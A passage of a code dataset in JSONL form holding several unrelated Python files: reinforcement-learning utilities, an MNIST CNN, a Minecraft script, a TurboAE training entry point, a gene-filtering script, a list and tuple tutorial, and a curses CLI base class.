random.randint(1,100)\nnum = int(num)\n\n\n\ngame()\n","sub_path":"NGv2.py","file_name":"NGv2.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"359428306","text":"import numpy as np\nimport scipy.ndimage as ndimage\nimport tensorflow as tf\nimport blosc\nimport random\n#from prototype11.atari_environment_wrapper import atari_environment\nfrom custom_environments.cart import Cart\nfrom custom_environments.cartpole import CartPole\nfrom custom_environments.pygames import ple_wrapper\nimport gym\n#from matplotlib import pyplot as plt\n#import pylab\nimport uuid\n\ndef process_frame2(frame):\n s = np.dot(frame, np.array([.299, .587, .114])).astype(np.uint8)\n s = ndimage.zoom(s, (0.4, 0.525))\n #s.resize((84, 84, 1))\n return s\n\nclass Memory:\n def __init__(self, size):\n self.max_size = size\n self.mem = []\n\n def add(self, element):\n self.mem.append(element)\n\n if len(self.mem) > self.max_size:\n self.mem.pop(0)\n\n def sample(self, size):\n size = min(size, len(self.mem))\n return random.sample(self.mem, size)\n\nclass Memory_with_compression:\n def __init__(self, size, shape=[84, 84, 4]):\n self.shape = [1] + shape\n self.max_size = size\n self.mem = []\n\n def add(self, element):\n ele = []\n ele.append(blosc.compress(np.reshape(element[0], np.prod(np.array(self.shape))).tobytes(), typesize=1)) #Current state\n ele.append(element[1]) #Action\n ele.append(element[2]) #Reward\n ele.append(blosc.compress(np.reshape(element[3], np.prod(np.array(self.shape))).tobytes(), typesize=1)) #Next state\n ele.append(element[4]) #Done\n self.mem.append(ele)\n\n if len(self.mem) > self.max_size:\n self.mem.pop(0)\n\n def sample(self, size):\n size = min(size, len(self.mem))\n elements = random.sample(self.mem, size)\n\n elements_decompressed = []\n for i in range(size):\n element_decompressed = []\n element_decompressed.append(np.reshape(np.fromstring(blosc.decompress(elements[i][0]), dtype=np.uint8), tuple(self.shape)))\n element_decompressed.append(elements[i][1])\n element_decompressed.append(elements[i][2])\n element_decompressed.append(np.reshape(np.fromstring(blosc.decompress(elements[i][3]), dtype=np.uint8), tuple(self.shape)))\n element_decompressed.append(elements[i][4])\n elements_decompressed.append(element_decompressed)\n return elements_decompressed\n\n def __del__(self):\n del self.mem\n\nclass Memory_with_compression2:\n def __init__(self, size, shape=[84, 84, 4]):\n self.shape = [1] + shape\n self.max_size = size\n self.mem = []\n\n def add(self, element):\n ele = []\n ele.append(blosc.compress(np.reshape(element[0], np.prod(np.array(self.shape))).tobytes(), typesize=1)) #States\n ele.append(element[1]) #Action\n ele.append(element[2]) #Reward\n ele.append(element[3]) #Done\n self.mem.append(ele)\n\n if len(self.mem) > self.max_size:\n self.mem.pop(0)\n\n def sample(self, size):\n size = min(size, len(self.mem))\n elements = random.sample(self.mem, size)\n\n elements_decompressed = []\n for i in range(size):\n element_decompressed = []\n element_decompressed.append(np.reshape(np.fromstring(blosc.decompress(elements[i][0]), dtype=np.uint8), tuple(self.shape)))\n element_decompressed.append(elements[i][1])\n element_decompressed.append(elements[i][2])\n element_decompressed.append(elements[i][3])\n elements_decompressed.append(element_decompressed)\n return elements_decompressed\n\n def __del__(self):\n del self.mem\n\ndef update_target_graph(from_scope, to_scope):\n from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)\n to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(from_var))\n return op_holder\n\ndef update_target_graph_vars(from_vars, to_vars):\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(from_var))\n return op_holder\n\n#A soft version of update target graph\ndef update_target_graph2(from_scope, to_scope, tau=.001):\n from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)\n to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)\n\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(tf.multiply(from_var, tau) + tf.multiply(to_var, 1. - tau)))\n return op_holder\n\ndef update_target_graph3(from_vars, to_vars, tau=.001):\n op_holder = []\n for from_var, to_var in zip(from_vars, to_vars):\n op_holder.append(to_var.assign(tf.multiply(from_var, tau) + tf.multiply(to_var, 1. - tau)))\n return op_holder\n\ndef split(array, w, s):\n assert len(array.shape) == 4\n channels = array.shape[-1]\n sliced = []\n rbegin = 0; cbegin = 0;\n while rbegin + w <= array.shape[1]:\n cbegin = 0\n while cbegin + w <= array.shape[2]:\n sliced.append(array[:, rbegin:rbegin+w, cbegin:cbegin+w, :])\n cbegin += s\n rbegin += s\n\n sliced = np.concatenate(sliced, axis=0)\n sliced = np.reshape(sliced, (-1, w * w * channels))\n sliced = sliced.astype(np.float64) / 255.\n return sliced\n\ndef unison_shuffled_copies(a, b):\n assert len(a) == len(b)\n p = np.random.permutation(len(a))\n return a[p], b[p]\n\ndef shuffle(a):\n p = np.random.permutation(len(a))\n return a[p]\n\nclass env_interface:\n def __init__(self, interface, rom=None, pixel_feature=None, padding=False, render=True):\n assert interface in ['gym', 'gym!atari', 'ale', 'custom_cart', 'custom_cartpole', 'ple']\n if interface in ['gym', 'ale']:\n assert rom is not None\n self.interface = interface\n self.rom = rom\n\n if interface in ['custom_cart', 'custom_cartpole']:\n assert pixel_feature in [True, False]\n self.pixel_feature = pixel_feature\n self.padding = padding\n self.render = render\n\n if self.interface == 'gym':\n self.env = gym.make(self.rom)\n self.action_size = self.env.action_space.n\n self.obs_space_shape = (210, 160, 3)\n if self.interface == 'gym!atari':\n self.env = gym.make(self.rom)\n self.action_size = self.env.action_space.n\n self.obs_space_shape = self.env.observation_space.shape\n elif self.interface == 'ale':\n self.env = atari_environment(self.rom, display_screen=False)\n self.action_size = self.env.num_actions\n self.obs_space_shape = (210, 160, 3)\n elif self.interface == 'custom_cart':\n self.env = Cart(pixelFeature=self.pixel_feature, render=self.render)\n if self.env.pixelFeature:\n self.obs_space_shape = self.env.screenSize\n elif self.env.pixelFeature == False and self.padding == True:\n self.obs_space_shape = (2, 2)\n else:\n self.obs_space_shape = (2,)\n self.action_size = self.env.numActions\n elif self.interface == 'custom_cartpole':\n self.env = CartPole(pixelFeature=self.pixel_feature, render=self.render)\n if self.env.pixelFeature:\n self.obs_space_shape = self.env.screenSize\n elif self.env.pixelFeature == False and self.padding == True:\n self.obs_space_shape = (2, 2)\n else:\n self.obs_space_shape = (4,)\n self.action_size = self.env.numActions\n elif self.interface == 'ple':\n self.env = ple_wrapper(rom)\n self.obs_space_shape = tuple(self.env.screen_dims)\n self.action_size = self.env.action_size\n\n def reset(self):\n if self.interface == 'gym':\n frame = process_frame2(self.env.reset())\n return frame\n elif self.interface == 'gym!atari':\n frame = self.env.reset()\n return frame\n elif self.interface == 'ale':\n frame = self.env.reset()\n return frame\n elif self.interface == 'custom_cart':\n self.env = Cart(pixelFeature=self.pixel_feature, render=self.render)\n frame = self.env.getCurrentState()\n return self.pad(frame)\n elif self.interface == 'custom_cartpole':\n self.env = CartPole(pixelFeature=self.pixel_feature, render=self.render)\n frame = self.env.getCurrentState()\n return self.pad(frame)\n elif self.interface == 'ple':\n return self.env.reset()\n\n def step(self, action):\n if self.interface == 'gym':\n frame, reward, done, info = self.env.step(action)\n frame = process_frame2(frame)\n return frame, reward, done, info \n if self.interface == 'gym!atari':\n frame, reward, done, info = self.env.step(action)\n return frame, reward, done, info\n elif self.interface == 'ale':\n frame, reward, done = self.env.step(action)\n return frame, float(reward), done, None\n elif self.interface == 'custom_cart':\n frame, reward, done = self.env.act(action - 1)\n return self.pad(frame) , reward, done, None\n elif self.interface == 'custom_cartpole':\n frame, reward, done = self.env.act(action - 1)\n return self.pad(frame) , reward, done, None\n elif self.interface == 'ple':\n frame, reward, done = self.env.step(action)\n return frame, reward, done, None\n \n def pad(self, frame):\n if self.padding == False:\n return frame\n assert self.pixel_feature == False\n if self.interface == 'custom_cart':\n ret = np.concatenate([frame[..., np.newaxis], np.zeros((2, 1))], axis=-1)\n return ret\n elif self.interface == 'custom_cartpole':\n return frame.reshape((2, 2,))\n\n def __del__(self):\n if self.interface == 'gym':\n self.env.close()\n\ndef parse_states(states, mode):\n assert mode in ['gbm', 'cc', 'gae']\n\n if mode == 'gbm':\n assert states.shape[-1] == 2\n return states[:, :, :, 0][..., np.newaxis], states[:, :, :, 1][..., np.newaxis]\n elif mode == 'cc' or mode == 'gae':\n assert len(states.shape) == 4\n return states, states\n\ndef parse_split_shuffle_states(states, mode, w, s):\n assert mode in ['gbm', 'cc', 'gae']\n\n if mode == 'gbm':\n x = states[:, :, :, 0][..., np.newaxis]\n y = states[:, :, :, 1][..., np.newaxis]\n x = split(x, w, s)\n y = split(y, w, s)\n x, y = unison_shuffled_copies(x, y)\n return x, y\n elif mode == 'cc' or mode == 'gae':\n x = split(states, w, s)\n x = shuffle(x)\n return x, x\n\n# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is\n# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\nclass OrnsteinUhlenbeckActionNoise:\n def __init__(self, mu, sigma=0.3, theta=.15, dt=1e-2, x0=None):\n self.theta = theta\n self.mu = mu\n self.sigma = sigma\n self.dt = dt\n self.x0 = x0\n self.reset()\n\n def __call__(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)\n self.x_prev = x\n return x\n\n def reset(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n\n def __repr__(self):\n return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)\n\ndef log(x):\n return tf.log(tf.maximum(x, 1e-6))\n\ndef lrelu(x, alpha=.2):\n return tf.nn.relu(x) - alpha * tf.nn.relu(-x)\n\ndef sample_z(batch_size, latent_size):\n #return np.random.uniform(-1., 1., [batch_size, latent_size])\n return np.random.normal(0., 1., [batch_size, latent_size])\n\ndef dispims(M, height, width, border=0, bordercolor=0.0, **kwargs):\n \"\"\" Display the columns of matrix M in a montage. \"\"\"\n numimages = M.shape[1]\n n0 = np.int(np.ceil(np.sqrt(numimages)))\n n1 = np.int(np.ceil(np.sqrt(numimages)))\n im = bordercolor*\\\n np.ones(((height+border)*n1+border,(width+border)*n0+border),dtype=' (3, 3, 1, 8) --> (None, 28, 28, 8) --> (None, 14, 14, 8)\r\nwith tf.name_scope('conv1'):\r\n weights = tf.Variable(tf.truncated_normal([3, 3, 1, nF1], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[nF1]), tf.float32, name='biasses')\r\n conv = tf.nn.conv2d(X_, weights, strides=[1,1,1,1], padding='SAME')\r\n conv = tf.nn.bias_add(conv, biasses, name='conv')\r\n relu = tf.nn.relu(conv, name='relu')\r\n pool = tf.nn.max_pool(relu, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\n\r\n# Second Convolutional Layer\r\n# (None, 14, 14, 8) --> (3, 3, 8, 12) --> (None, 14, 14, 12) --> (None, 7, 7, 12)\r\nwith tf.name_scope('conv2'):\r\n weights = tf.Variable(tf.truncated_normal([3, 3, nF1, nF2], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[nF2]), tf.float32, name='biasses')\r\n conv = tf.nn.conv2d(pool, weights, strides=[1,1,1,1], padding='SAME')\r\n conv = tf.nn.bias_add(conv, biasses, name='conv')\r\n relu = tf.nn.relu(conv, name='relu')\r\n pool = tf.nn.max_pool(relu, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\r\n\r\npool_shape = pool.get_shape().as_list()\r\nn_flat = pool_shape[1] * pool_shape[2] * pool_shape[3]\r\n# (None, 7, 7, 12) --> (None, 7*7*12)\r\npool_flat = tf.reshape(pool, shape=[-1, n_flat])\r\n\r\n# First Fully Connected Layer\r\n# (None, 7*7*12) --> (None, 120)\r\nwith tf.name_scope('fc1'):\r\n weights = tf.Variable(tf.truncated_normal([n_flat, nFc1], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[nFc1]), tf.float32, name='biasses')\r\n fc = tf.matmul(pool_flat, weights)\r\n fc = tf.nn.bias_add(fc, biasses, name='fc')\r\n relu = tf.nn.relu(fc, name='relu')\r\n fc = tf.nn.dropout(relu, keep_prob=keep_prob)\r\n \r\n# Second Fully Connected Layer\r\n# (None, 120) --> (None, 10)\r\nwith tf.name_scope('fc2'):\r\n weights = tf.Variable(tf.truncated_normal([nFc1, n_classes], mean=0.0, stddev=0.1), tf.float32, name='weights')\r\n biasses = tf.Variable(tf.constant(0.1, shape=[n_classes]), tf.float32, name='biasses')\r\n fc = tf.matmul(fc, weights)\r\n fc = tf.nn.bias_add(fc, biasses, name='fc')\r\n logits = tf.nn.softmax(fc)\r\n\r\n# loss\r\nloss = -tf.reduce_mean(Y * tf.log(logits))\r\n \r\n# optimizer\r\nopt = tf.train.AdamOptimizer(learning_rate=0.001).minimize(loss)\r\n\r\n# accuracy\r\naccuracy = tf.equal(tf.argmax(logits, axis=1), tf.argmax(Y, axis=1))\r\naccuracy = tf.cast(accuracy, tf.float32)\r\naccuracy = tf.reduce_mean(accuracy)\r\n\r\n# training variables\r\nn_epochs = 5\r\nbatch_size = 128\r\nn_itrs = n_train // batch_size\r\ndisplay_step = 10\r\n\r\nwith tf.Session() as sess:\r\n \r\n # initialize variables\r\n sess.run(tf.global_variables_initializer())\r\n \r\n for epoch in range(n_epochs):\r\n for itr in range(n_itrs):\r\n \r\n batch_x, batch_y = mnist.train.next_batch(batch_size)\r\n \r\n feed_dict = {X: batch_x, Y: batch_y, keep_prob: 0.8}\r\n sess.run(opt, feed_dict=feed_dict)\r\n \r\n if ((itr+1) % display_step == 0):\r\n # evaluate for minibatch\r\n feed_dict = {X: batch_x, Y: batch_y, keep_prob: 1.0}\r\n loss_val, acc_val = sess.run([loss, accuracy], feed_dict=feed_dict)\r\n \r\n print('epoch= ', epoch, 'minibatch loss= ', loss_val, 'minibatch acc= ', acc_val)\r\n \r\n \r\n # evaluate in each epoch\r\n feed_dict = {X: mnist.test.images,\r\n Y: mnist.test.labels,\r\n keep_prob: 1.0}\r\n loss_val, acc_val = sess.run([loss, accuracy], feed_dict=feed_dict)\r\n \r\n print('epoch= ', epoch, 'epoch loss= ', loss_val, 'epoch acc= ', acc_val)\r\n\r\n\r\n\r\n","sub_path":"codes/week2/mnist_cnn_dropout.py","file_name":"mnist_cnn_dropout.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"530742653","text":"import time,mcpi.minecraft as minecraft #imports necessary modules and renames one as minecraft for easy of use\nmc=minecraft.Minecraft.create() # Creates game and connects to it.\n\ntime.sleep(3)\n\ndef place_flower():\n while True:\n x,y,z=mc.player.getPos()\n mc.setBlock(x,y,z,38)\n time.sleep(0.2)\n\ndef place_gold():\n while True:\n x,y,z=mc.player.getPos()\n mc.setBlock(x,float(y-0.2),z,41)\n time.sleep(0.05)\n\n\nplace_gold()\n","sub_path":"Minecraft/flower_follow_minecraft.py","file_name":"flower_follow_minecraft.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"324720399","text":"__author__ = 'yihanjiang'\n# update 10/18/2019, code to replicate TurboAE paper in NeurIPS 2019.\n# Tested on PyTorch 1.0.\n# TBD: remove all non-TurboAE related functions.\n\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport sys\nfrom get_args import get_args\nfrom trainer import train, validate, test\n\nfrom numpy import arange\nfrom numpy.random import mtrand\n\n# utils for logger\nclass Logger(object):\n def __init__(self, filename, stream=sys.stdout):\n self.terminal = stream\n self.log = open(filename, 'a')\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n pass\n\ndef import_enc(args):\n # choose encoder\n\n if args.encoder == 'TurboAE_rate3_rnn':\n from encoders import ENC_interRNN as ENC\n\n elif args.encoder in ['TurboAE_rate3_cnn', 'TurboAE_rate3_cnn_dense']:\n from encoders import ENC_interCNN as ENC\n\n elif args.encoder == 'turboae_2int':\n from encoders import ENC_interCNN2Int as ENC\n\n elif args.encoder == 'rate3_cnn':\n from encoders import CNN_encoder_rate3 as ENC\n\n elif args.encoder in ['TurboAE_rate3_cnn2d', 'TurboAE_rate3_cnn2d_dense']:\n from encoders import ENC_interCNN2D as ENC\n\n elif args.encoder == 'TurboAE_rate3_rnn_sys':\n from encoders import ENC_interRNN_sys as ENC\n\n elif args.encoder == 'TurboAE_rate2_rnn':\n from encoders import ENC_turbofy_rate2 as ENC\n\n elif args.encoder == 'TurboAE_rate2_cnn':\n from encoders import ENC_turbofy_rate2_CNN as ENC # not done yet\n\n elif args.encoder in ['Turbo_rate3_lte', 'Turbo_rate3_757']:\n from encoders import ENC_TurboCode as ENC # DeepTurbo, encoder not trainable.\n\n elif args.encoder == 'rate3_cnn2d':\n from encoders import ENC_CNN2D as ENC\n\n else:\n print('Unknown Encoder, stop')\n\n return ENC\n\ndef import_dec(args):\n\n if args.decoder == 'TurboAE_rate2_rnn':\n from decoders import DEC_LargeRNN_rate2 as DEC\n\n elif args.decoder == 'TurboAE_rate2_cnn':\n from decoders import DEC_LargeCNN_rate2 as DEC # not done yet\n\n elif args.decoder in ['TurboAE_rate3_cnn', 'TurboAE_rate3_cnn_dense']:\n from decoders import DEC_LargeCNN as DEC\n\n elif args.decoder == 'turboae_2int':\n from decoders import DEC_LargeCNN2Int as DEC\n\n elif args.encoder == 'rate3_cnn':\n from decoders import CNN_decoder_rate3 as DEC\n\n elif args.decoder in ['TurboAE_rate3_cnn2d', 'TurboAE_rate3_cnn2d_dense']:\n from decoders import DEC_LargeCNN2D as DEC\n\n elif args.decoder == 'TurboAE_rate3_rnn':\n from decoders import DEC_LargeRNN as DEC\n\n elif args.decoder == 'nbcjr_rate3': # ICLR 2018 paper\n from decoders import NeuralTurbofyDec as DEC\n\n elif args.decoder == 'rate3_cnn2d':\n from decoders import DEC_CNN2D as DEC\n\n return DEC\n\nif __name__ == '__main__':\n #################################################\n # load args & setup logger\n #################################################\n identity = str(np.random.random())[2:8]\n print('[ID]', identity)\n\n # put all printed things to log file\n logfile = open('./logs/'+identity+'_log.txt', 'a')\n sys.stdout = Logger('./logs/'+identity+'_log.txt', sys.stdout)\n\n args = get_args()\n print(args)\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n #################################################\n # Setup Channel AE: Encoder, Decoder, Channel\n #################################################\n # choose encoder and decoder.\n ENC = import_enc(args)\n DEC = import_dec(args)\n\n # setup interleaver.\n if args.is_interleave == 1: # fixed interleaver.\n seed = np.random.randint(0, 1)\n rand_gen = mtrand.RandomState(seed)\n p_array1 = rand_gen.permutation(arange(args.block_len))\n p_array2 = rand_gen.permutation(arange(args.block_len))\n\n elif args.is_interleave == 0:\n p_array1 = range(args.block_len) # no interleaver.\n p_array2 = range(args.block_len) # no interleaver.\n else:\n seed = np.random.randint(0, args.is_interleave)\n rand_gen = mtrand.RandomState(seed)\n p_array1 = rand_gen.permutation(arange(args.block_len))\n seed = np.random.randint(0, args.is_interleave)\n rand_gen = mtrand.RandomState(seed)\n p_array2 = rand_gen.permutation(arange(args.block_len))\n\n print('using random interleaver', p_array1, p_array2)\n\n if args.encoder == 'turboae_2int' and args.decoder == 'turboae_2int':\n encoder = ENC(args, p_array1, p_array2)\n decoder = DEC(args, p_array1, p_array2)\n else:\n encoder = ENC(args, p_array1)\n decoder = DEC(args, p_array1)\n\n # choose support channels\n from channel_ae import Channel_AE\n model = Channel_AE(args, encoder, decoder).to(device)\n\n # model = Channel_ModAE(args, encoder, decoder).to(device)\n\n\n # make the model parallel\n if args.is_parallel == 1:\n model.enc.set_parallel()\n model.dec.set_parallel()\n\n # weight loading\n if args.init_nw_weight == 'default':\n pass\n\n else:\n pretrained_model = torch.load(args.init_nw_weight)\n\n try:\n model.load_state_dict(pretrained_model.state_dict(), strict = False)\n\n except:\n model.load_state_dict(pretrained_model, strict = False)\n\n model.args = args\n\n print(model)\n\n\n ##################################################################\n # Setup Optimizers, only Adam and Lookahead for now.\n ##################################################################\n\n if args.optimizer == 'lookahead':\n print('Using Lookahead Optimizers')\n from optimizers import Lookahead\n lookahead_k = 5\n lookahead_alpha = 0.5\n if args.num_train_enc != 0 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']: # no optimizer for encoder\n enc_base_opt = optim.Adam(model.enc.parameters(), lr=args.enc_lr)\n enc_optimizer = Lookahead(enc_base_opt, k=lookahead_k, alpha=lookahead_alpha)\n\n if args.num_train_dec != 0:\n dec_base_opt = optim.Adam(filter(lambda p: p.requires_grad, model.dec.parameters()), lr=args.dec_lr)\n dec_optimizer = Lookahead(dec_base_opt, k=lookahead_k, alpha=lookahead_alpha)\n\n general_base_opt = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()),lr=args.dec_lr)\n general_optimizer = Lookahead(general_base_opt, k=lookahead_k, alpha=lookahead_alpha)\n\n else: # Adam, SGD, etc....\n if args.optimizer == 'adam':\n OPT = optim.Adam\n elif args.optimizer == 'sgd':\n OPT = optim.SGD\n else:\n OPT = optim.Adam\n\n if args.num_train_enc != 0 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']: # no optimizer for encoder\n enc_optimizer = OPT(model.enc.parameters(),lr=args.enc_lr)\n\n if args.num_train_dec != 0:\n dec_optimizer = OPT(filter(lambda p: p.requires_grad, model.dec.parameters()), lr=args.dec_lr)\n\n general_optimizer = OPT(filter(lambda p: p.requires_grad, model.parameters()),lr=args.dec_lr)\n\n #################################################\n # Training Processes\n #################################################\n report_loss, report_ber = [], []\n\n for epoch in range(1, args.num_epoch + 1):\n\n if args.joint_train == 1 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']:\n for idx in range(args.num_train_enc+args.num_train_dec):\n train(epoch, model, general_optimizer, args, use_cuda = use_cuda, mode ='encoder')\n\n else:\n if args.num_train_enc > 0 and args.encoder not in ['Turbo_rate3_lte', 'Turbo_rate3_757']:\n for idx in range(args.num_train_enc):\n train(epoch, model, enc_optimizer, args, use_cuda = use_cuda, mode ='encoder')\n\n if args.num_train_dec > 0:\n for idx in range(args.num_train_dec):\n train(epoch, model, dec_optimizer, args, use_cuda = use_cuda, mode ='decoder')\n\n this_loss, this_ber = validate(model, general_optimizer, args, use_cuda = use_cuda)\n report_loss.append(this_loss)\n report_ber.append(this_ber)\n\n if args.print_test_traj == True:\n print('test loss trajectory', report_loss)\n print('test ber trajectory', report_ber)\n print('total epoch', args.num_epoch)\n\n #################################################\n # Testing Processes\n #################################################\n\n torch.save(model.state_dict(), './tmp/torch_model_'+identity+'.pt')\n print('saved model', './tmp/torch_model_'+identity+'.pt')\n\n if args.is_variable_block_len:\n print('testing block length',args.block_len_low )\n test(model, args, block_len=args.block_len_low, use_cuda = use_cuda)\n print('testing block length',args.block_len )\n test(model, args, block_len=args.block_len, use_cuda = use_cuda)\n print('testing block length',args.block_len_high )\n test(model, args, block_len=args.block_len_high, use_cuda = use_cuda)\n\n else:\n test(model, args, use_cuda = use_cuda)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"508295996","text":"def SingleGene(inF, Genes, HeadCutOff=10):\n D = {}\n\n inFile = open(inF)\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n if len(fields) < HeadCutOff:\n pass\n else:\n head = line\n for g in Genes:\n D.setdefault(g, [head])\n break\n\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n g = fields[1]\n if g in Genes:\n D[g].append(line)\n\n for g in Genes:\n print('Number of lines (including head): ' + str(len(D[g])))\n ouFile = open(inF + '_' + g, 'w')\n ouFile.write('\\n'.join(D[g]) + '\\n')\n ouFile.close()\n inFile.close()\n\nMT = ['MT-ATP6','MT-ATP8','MT-ND1','MT-ND2','MT-ND3','MT-ND4','MT-ND4L','MT-ND5','MT-ND6','MT-CO1','MT-CO2','MT-CO3','MT-CYB']\nSingleGene('GTEx_GeneReadCounts', Genes=['IMMT','RBM20', 'LDB3', 'CAMK2D'] + MT)\nSingleGene('GTEx_GeneTPM', Genes=['IMMT','RBM20', 'LDB3', 'CAMK2D'] + MT)\n\n\n","sub_path":"Data/GTEx/GTExV7/IMMT/02-SingleGene.py","file_name":"02-SingleGene.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"221651887","text":"# list是一个有序集合,可以随时添加和删除其中的元素\nclassmates = [\"Michael\", \"Bob\", \"Tracy\"]\nprint(len(classmates))\nprint(classmates[0], classmates[1], classmates[2])\n\n# 获取最后元素 -1,-2....-n\nprint(classmates[-1])\nprint(classmates[-2])\n\n# list是一个可变的有序表,所以,可以往list中追加元素到末尾\nclassmates.append(\"Adam\")\nprint(classmates[-1])\n\n# 把元素插入到指定位置\nclassmates.insert(1, \"Jack\")\ni = 0\nfor classmate in classmates:\n print(str(i) + \" \" + classmate)\n i = i + 1\n\n# 删除list末尾元素\nclassmates.pop()\ni = 0\nfor classmate in classmates:\n print(str(i) + \" \" + classmate)\n i = i + 1\n\n# 替换某元素的值\nclassmates[1] = \"Admin\"\ni = 0\nfor classmate in classmates:\n print(str(i) + \" \" + classmate)\n i = i + 1\n\n# list 可以存储不同类型的元素\nLS = [\"Panda\", 123, \"15gdy\"]\ni = 0\nfor L in LS:\n print(str(i) + \" \" + str(L))\n i = i + 1\n\n# 一个list中的元素也可以是另一个list\nLS = [\"A\", \"B\", \"C\", [\"D\", \"E\", \"F\"], \"G\"]\nfor L in LS:\n print(L)\n\nprint(classmates)\n\n# tuple有序列表元组,tuple一旦初始化就不能修改\nTuple = (\"A\", \"B\", \"C\", \"D\")\nprint(Tuple)\n\n# Tuple这个tuple不能变了,它也没有append(),insert()这样的方法。\n# 其他获取元素的方法和list是一样的,你可以正常地使Tuple[0],Tuple[-1],但不能赋值成另外的元素。\n\n# \"可变tuple\"\nt = ('a', 'b', ['A', 'B'])\nprint(t)\nt[2][0] = \"X\"\nt[2][1] = \"Y\"\nprint(t)\n","sub_path":"ListTuple.py","file_name":"ListTuple.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"555703465","text":"__author__ = 'Marvin Smith'\n\n\n# Python Libraries\nimport curses, logging\n\n#------------------------------------#\n#- Base CLI Window Object -#\n#------------------------------------#\nclass CLI_Window_Base(object):\n\n # Is Running\n is_running = True\n\n # Database Manager\n database_manager = None\n\n # Window Title\n window_title = None\n\n\n #-----------------------------#\n #- Constructor -#\n #-----------------------------#\n def __init__(self, window_title):\n\n # Set the window title\n self.window_title = window_title\n\n\n #----------------------------------#\n #- Render the Window -#\n #----------------------------------#\n def Render(self, screen, database_manager):\n raise Exception('Not implemented in base type.')\n\n\n #------------------------#\n #- Run CLI -#\n #------------------------#\n def Run(self, stdscr, database_manager, init_curses=False):\n\n # Check if we need to initialize curses\n if init_curses is True:\n self.Initialize_Curses()\n\n\n # Set the screen\n self.screen = stdscr\n\n # Database manager\n self.database_manager = database_manager\n\n\n # While running\n while self.is_running is True:\n\n # Render the Main Window\n self.Render()\n\n # Get the input\n c = self.screen.getch()\n\n # Process the Keyboard Input\n self.Process_Keyboard_Input(c)\n\n # Always return the database manager\n return self.database_manager\n\n\n # ------------------------------ #\n # - Initialize Curses - #\n # ------------------------------ #\n def Initialize_Curses(self):\n\n # Initialize Color Pairs\n logging.debug('Initializing Curses Color Pairs.')\n\n # Use for Cursor Overlays\n curses.init_pair( 1, curses.COLOR_BLACK, curses.COLOR_WHITE)\n\n # Use for Error Windows\n curses.init_pair( 2, curses.COLOR_BLACK, curses.COLOR_RED)\n\n # Use for Error Text\n curses.init_pair( 3, curses.COLOR_RED, curses.COLOR_BLACK)\n\n # Use for Simple Backgrounds\n curses.init_pair( 4, curses.COLOR_WHITE, curses.COLOR_BLUE )\n curses.init_pair( 5, curses.COLOR_BLUE, curses.COLOR_WHITE )\n\n #-------------------------------------------#\n #- Check if Input is a Character -#\n #-------------------------------------------#\n def Is_Character(self, input):\n\n # a-z\n if input >= ord('a') and input <= ord('z'):\n return True\n\n # A-Z\n if input >= ord('A') and input <= ord('Z'):\n return True\n\n # Number\n if input >= ord('0') and input <= ord('9'):\n return True\n\n # Special Characters\n if input in [ord(x) for x in [' ', '.', '?']]:\n return True\n\n return False\n\n\n #---------------------------------------------#\n #- Delete a character from the input -#\n #---------------------------------------------#\n def Remove_Letter(self, text, cursor):\n\n # Back up\n if cursor < len(text)+1:\n text = text[0:cursor-1] + text[cursor:]\n\n # Fix the cursor\n cursor = max( cursor-1, 0)\n return [text, cursor]\n","sub_path":"cost_tracker/cli/CLI_Window_Base.py","file_name":"CLI_Window_Base.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"547402445","text":"import logging\nimport unittest\nimport uuid\n\nfrom tests.utils import config_logs\nfrom titus_isolate.allocate.greedy_cpu_allocator import GreedyCpuAllocator\nfrom 